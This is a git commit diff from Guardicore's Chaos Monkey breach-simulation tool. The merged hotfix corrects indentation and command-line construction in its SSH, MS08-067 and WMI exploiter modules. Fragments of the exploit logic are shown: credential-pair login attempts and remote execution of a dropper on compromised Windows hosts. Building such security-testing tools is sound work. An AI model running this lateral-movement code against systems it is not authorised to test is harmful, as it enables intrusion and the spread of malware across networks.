Merge pull request #50 from guardicore/hotfix/various-fixes

Hotfix/various fixes
2017-09-26 12:02:39 +03:00 · 2017-09-26 12:02:39 +03:00 · 1efbadcacd
parent cc9465e8bf 9b087628be
commit 1efbadcacd
3 changed files with 10 additions and 10 deletions
--- a/chaos_monkey/exploit/sshexec.py
+++ b/chaos_monkey/exploit/sshexec.py
@ -44,7 +44,7 @@ class SSHExploiter(HostExploiter):
            LOG.info("SSH port is closed on %r, skipping", host)
            return False

-            user_password_pairs = self._config.get_exploit_user_password_pairs()
+        user_password_pairs = self._config.get_exploit_user_password_pairs()

        exploited = False
        for user, curpass in user_password_pairs:
--- a/chaos_monkey/exploit/win_ms08_067.py
+++ b/chaos_monkey/exploit/win_ms08_067.py
@ -249,11 +249,11 @@ class Ms08_067_Exploiter(HostExploiter):

        # execute the remote dropper in case the path isn't final
        if remote_full_path.lower() != self._config.dropper_target_path.lower():
-            cmdline = DROPPER_CMDLINE_WINDOWS % {'dropper_path': remote_full_path}
+            cmdline = DROPPER_CMDLINE_WINDOWS % {'dropper_path': remote_full_path} + \
+                      build_monkey_commandline(host, depth - 1, self._config.dropper_target_path)
        else:
-            cmdline = MONKEY_CMDLINE_WINDOWS % {'monkey_path': remote_full_path}
-
-        cmdline += build_monkey_commandline(host, depth - 1)
+            cmdline = MONKEY_CMDLINE_WINDOWS % {'monkey_path': remote_full_path} + \
+                      build_monkey_commandline(host, depth - 1)

        try:
            sock.send("start %s\r\n" % (cmdline, ))
--- a/chaos_monkey/exploit/wmiexec.py
+++ b/chaos_monkey/exploit/wmiexec.py
@ -29,7 +29,7 @@ class WmiExploiter(HostExploiter):
            LOG.info("Can't find suitable monkey executable for host %r", host)
            return False

-            user_password_pairs = self._config.get_exploit_user_password_pairs()
+        user_password_pairs = self._config.get_exploit_user_password_pairs()

        for user, password in user_password_pairs:
            LOG.debug("Attempting to connect %r using WMI with password '%s'",
@ -84,11 +84,11 @@ class WmiExploiter(HostExploiter):
                return False
            # execute the remote dropper in case the path isn't final
            elif remote_full_path.lower() != self._config.dropper_target_path.lower():
-                cmdline = DROPPER_CMDLINE_WINDOWS % {'dropper_path': remote_full_path}
+                cmdline = DROPPER_CMDLINE_WINDOWS % {'dropper_path': remote_full_path} + \
+                          build_monkey_commandline(host, depth - 1, self._config.dropper_target_path)
            else:
-                cmdline = MONKEY_CMDLINE_WINDOWS % {'monkey_path': remote_full_path}
-
-            cmdline += build_monkey_commandline(host, depth - 1)
+                cmdline = MONKEY_CMDLINE_WINDOWS % {'monkey_path': remote_full_path} + \
+                          build_monkey_commandline(host, depth - 1)

            # execute the remote monkey
            result = WmiTools.get_object(wmi_connection, "Win32_Process").Create(cmdline,